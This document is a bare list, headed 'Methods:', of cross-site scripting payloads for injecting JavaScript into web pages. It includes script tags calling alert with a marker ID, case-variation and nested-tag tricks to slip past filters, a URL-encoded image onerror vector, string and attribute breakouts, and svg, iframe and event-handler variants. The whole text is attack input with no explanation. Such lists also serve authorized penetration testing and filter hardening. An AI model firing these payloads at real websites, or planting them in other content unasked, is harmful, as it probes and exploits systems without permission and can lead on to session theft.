Methods:

<script>alert('2896f1b2-d3c9-4b23-9ece-d6137cbf6b36')</script>

<script>confirm('2896f1b2-d3c9-4b23-9ece-d6137cbf6b36')</script>

<sCript>alert('2896f1b2-d3c9-4b23-9ece-d6137cbf6b36')</sCript>

<sc<script>ript>alert('2896f1b2-d3c9-4b23-9ece-d6137cbf6b36')</sc</script>ript>

%3Cimg%20src=%22zzzzz.jpg%22%22%20onerror=%20alert(%272896f1b2-d3c9-4b23-9ece-d6137cbf6b36%27)%20%3E%3C/img%3E


";alert(1);var a="

"><svg onload=alert(1)>

<SCRIPT>alert('XSS')</SCRIPT>

<IMG SRC="#" ONERROR="alert('XSS')"/>

<INPUT TYPE="BUTTON" ONCLICK="alert('XSS')"/>

<IMG SRC="#" ONSELECT="alert('XSS')"/>

<IFRAME SRC="javascript:alert('XSS');"></IFRAME>

